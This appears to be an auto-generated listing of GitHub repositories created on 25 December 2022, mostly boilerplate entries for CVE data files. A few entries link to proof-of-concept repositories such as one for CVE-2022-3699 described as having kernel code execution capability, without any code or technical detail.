**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3467](https://github.com/Live-Hack-CVE/CVE-2019-3467) create time: 2022-12-25T12:20:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15692 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15692](https://github.com/Live-Hack-CVE/CVE-2019-15692) create time: 2022-12-25T12:20:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15679 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15679](https://github.com/Live-Hack-CVE/CVE-2020-15679) create time: 2022-12-25T12:14:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15685](https://github.com/Live-Hack-CVE/CVE-2020-15685) create time: 2022-12-25T12:13:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26302 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26302](https://github.com/Live-Hack-CVE/CVE-2020-26302) create time: 2022-12-25T11:35:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4246 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4246](https://github.com/Live-Hack-CVE/CVE-2021-4246) create time: 2022-12-25T12:23:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3759 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3759](https://github.com/Live-Hack-CVE/CVE-2021-3759) create time: 2022-12-25T12:22:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33640 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33640](https://github.com/Live-Hack-CVE/CVE-2021-33640) create time: 2022-12-25T12:22:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4248 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4248](https://github.com/Live-Hack-CVE/CVE-2021-4248) create time: 2022-12-25T12:22:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4247 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4247](https://github.com/Live-Hack-CVE/CVE-2021-4247) create time: 2022-12-25T12:20:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4129](https://github.com/Live-Hack-CVE/CVE-2021-4129) create time: 2022-12-25T12:14:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4127 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4127](https://github.com/Live-Hack-CVE/CVE-2021-4127) create time: 2022-12-25T12:14:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4126](https://github.com/Live-Hack-CVE/CVE-2021-4126) create time: 2022-12-25T12:14:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4140 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4140](https://github.com/Live-Hack-CVE/CVE-2021-4140) create time: 2022-12-25T12:14:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4128 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4128](https://github.com/Live-Hack-CVE/CVE-2021-4128) create time: 2022-12-25T12:13:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4572 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4572](https://github.com/Live-Hack-CVE/CVE-2022-4572) create time: 2022-12-25T12:23:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4581 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4581](https://github.com/Live-Hack-CVE/CVE-2022-4581) create time: 2022-12-25T12:23:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4582 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4582](https://github.com/Live-Hack-CVE/CVE-2022-4582) create time: 2022-12-25T12:23:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4584 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4584](https://github.com/Live-Hack-CVE/CVE-2022-4584) create time: 2022-12-25T12:23:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4585 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4585](https://github.com/Live-Hack-CVE/CVE-2022-4585) create time: 2022-12-25T12:23:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4586 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4586](https://github.com/Live-Hack-CVE/CVE-2022-4586) create time: 2022-12-25T12:23:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4587 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4587](https://github.com/Live-Hack-CVE/CVE-2022-4587) create time: 2022-12-25T12:23:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26579 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26579](https://github.com/Live-Hack-CVE/CVE-2022-26579) create time: 2022-12-25T12:23:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26581 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26581](https://github.com/Live-Hack-CVE/CVE-2022-26581) create time: 2022-12-25T12:23:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3169 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3169](https://github.com/Live-Hack-CVE/CVE-2022-3169) create time: 2022-12-25T12:22:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47521 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47521](https://github.com/Live-Hack-CVE/CVE-2022-47521) create time: 2022-12-25T12:22:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47520 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47520](https://github.com/Live-Hack-CVE/CVE-2022-47520) create time: 2022-12-25T12:22:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47519 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47519](https://github.com/Live-Hack-CVE/CVE-2022-47519) create time: 2022-12-25T12:22:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47518 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47518](https://github.com/Live-Hack-CVE/CVE-2022-47518) create time: 2022-12-25T12:22:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26580 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26580](https://github.com/Live-Hack-CVE/CVE-2022-26580) create time: 2022-12-25T12:22:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26582 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26582](https://github.com/Live-Hack-CVE/CVE-2022-26582) create time: 2022-12-25T12:22:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4591 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4591](https://github.com/Live-Hack-CVE/CVE-2022-4591) create time: 2022-12-25T12:22:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4592 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4592](https://github.com/Live-Hack-CVE/CVE-2022-4592) create time: 2022-12-25T12:22:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4593 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4593](https://github.com/Live-Hack-CVE/CVE-2022-4593) create time: 2022-12-25T12:22:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4599 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4599](https://github.com/Live-Hack-CVE/CVE-2022-4599) create time: 2022-12-25T12:22:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4598 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4598](https://github.com/Live-Hack-CVE/CVE-2022-4598) create time: 2022-12-25T12:22:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4602 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4602](https://github.com/Live-Hack-CVE/CVE-2022-4602) create time: 2022-12-25T12:22:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4601 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4601](https://github.com/Live-Hack-CVE/CVE-2022-4601) create time: 2022-12-25T12:21:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4595 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4595](https://github.com/Live-Hack-CVE/CVE-2022-4595) create time: 2022-12-25T12:21:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4600 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4600](https://github.com/Live-Hack-CVE/CVE-2022-4600) create time: 2022-12-25T12:21:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38756 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38756](https://github.com/Live-Hack-CVE/CVE-2022-38756) create time: 2022-12-25T12:21:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4566](https://github.com/Live-Hack-CVE/CVE-2022-4566) create time: 2022-12-25T12:21:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23490 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23490](https://github.com/Live-Hack-CVE/CVE-2022-23490) create time: 2022-12-25T12:21:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4590 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4590](https://github.com/Live-Hack-CVE/CVE-2022-4590) create time: 2022-12-25T12:21:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47514 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47514](https://github.com/Live-Hack-CVE/CVE-2022-47514) create time: 2022-12-25T12:21:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6230 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6230](https://github.com/Live-Hack-CVE/CVE-2014-6230) create time: 2022-12-25T11:00:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3227 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3227](https://github.com/Live-Hack-CVE/CVE-2020-3227) create time: 2022-12-25T10:59:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3118](https://github.com/Live-Hack-CVE/CVE-2020-3118) create time: 2022-12-25T10:59:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35476 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35476](https://github.com/Live-Hack-CVE/CVE-2020-35476) create time: 2022-12-25T10:58:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32692 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32692](https://github.com/Live-Hack-CVE/CVE-2021-32692) create time: 2022-12-25T11:01:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46784 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46784](https://github.com/Live-Hack-CVE/CVE-2021-46784) create time: 2022-12-25T11:00:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33623 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33623](https://github.com/Live-Hack-CVE/CVE-2021-33623) create time: 2022-12-25T10:59:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4221](https://github.com/Live-Hack-CVE/CVE-2021-4221) create time: 2022-12-25T10:53:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23513 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23513](https://github.com/Live-Hack-CVE/CVE-2022-23513) create time: 2022-12-25T11:01:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47928](https://github.com/Live-Hack-CVE/CVE-2022-47928) create time: 2022-12-25T11:01:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46493 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46493](https://github.com/Live-Hack-CVE/CVE-2022-46493) create time: 2022-12-25T11:01:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46491](https://github.com/Live-Hack-CVE/CVE-2022-46491) create time: 2022-12-25T11:01:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33324 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33324](https://github.com/Live-Hack-CVE/CVE-2022-33324) create time: 2022-12-25T11:01:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4665 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4665](https://github.com/Live-Hack-CVE/CVE-2022-4665) create time: 2022-12-25T11:01:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46492 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46492](https://github.com/Live-Hack-CVE/CVE-2022-46492) create time: 2022-12-25T11:01:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42818 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42818](https://github.com/Live-Hack-CVE/CVE-2022-42818) create time: 2022-12-25T11:01:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4690 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4690](https://github.com/Live-Hack-CVE/CVE-2022-4690) create time: 2022-12-25T11:00:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4689 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4689](https://github.com/Live-Hack-CVE/CVE-2022-4689) create time: 2022-12-25T11:00:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4688 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4688](https://github.com/Live-Hack-CVE/CVE-2022-4688) create time: 2022-12-25T11:00:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4687 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4687](https://github.com/Live-Hack-CVE/CVE-2022-4687) create time: 2022-12-25T11:00:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4686 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4686](https://github.com/Live-Hack-CVE/CVE-2022-4686) create time: 2022-12-25T11:00:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4685](https://github.com/Live-Hack-CVE/CVE-2022-4685) create time: 2022-12-25T11:00:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4684 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4684](https://github.com/Live-Hack-CVE/CVE-2022-4684) create time: 2022-12-25T11:00:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4683 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4683](https://github.com/Live-Hack-CVE/CVE-2022-4683) create time: 2022-12-25T11:00:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2938 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2938](https://github.com/Live-Hack-CVE/CVE-2022-2938) create time: 2022-12-25T11:00:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3545 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3545](https://github.com/Live-Hack-CVE/CVE-2022-3545) create time: 2022-12-25T11:00:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3165 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3165](https://github.com/Live-Hack-CVE/CVE-2022-3165) create time: 2022-12-25T11:00:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47524 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47524](https://github.com/Live-Hack-CVE/CVE-2022-47524) create time: 2022-12-25T10:59:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46171 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46171](https://github.com/Live-Hack-CVE/CVE-2022-46171) create time: 2022-12-25T10:59:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4698 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4698](https://github.com/Live-Hack-CVE/CVE-2022-4698) create time: 2022-12-25T10:59:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4697 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4697](https://github.com/Live-Hack-CVE/CVE-2022-4697) create time: 2022-12-25T10:59:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38757 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38757](https://github.com/Live-Hack-CVE/CVE-2022-38757) create time: 2022-12-25T10:59:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46642 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46642](https://github.com/Live-Hack-CVE/CVE-2022-46642) create time: 2022-12-25T10:59:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46641](https://github.com/Live-Hack-CVE/CVE-2022-46641) create time: 2022-12-25T10:59:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44567 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44567](https://github.com/Live-Hack-CVE/CVE-2022-44567) create time: 2022-12-25T10:59:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44565 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44565](https://github.com/Live-Hack-CVE/CVE-2022-44565) create time: 2022-12-25T10:59:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43551 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43551](https://github.com/Live-Hack-CVE/CVE-2022-43551) create time: 2022-12-25T10:59:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23547 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23547](https://github.com/Live-Hack-CVE/CVE-2022-23547) create time: 2022-12-25T10:59:14Z

**no description** : [Ki11i0n4ir3/CVE-2021-29447](https://github.com/Ki11i0n4ir3/CVE-2021-29447) create time: 2022-12-25T07:44:21Z

**no description** : [meowhua15/CVE-2021-3156](https://github.com/meowhua15/CVE-2021-3156) create time: 2022-12-25T03:58:20Z

**CVE-2022-3699 with arbitrary kernel code execution capability** : [estimated1337/lenovo_exec](https://github.com/estimated1337/lenovo_exec) create time: 2022-12-25T04:34:26Z

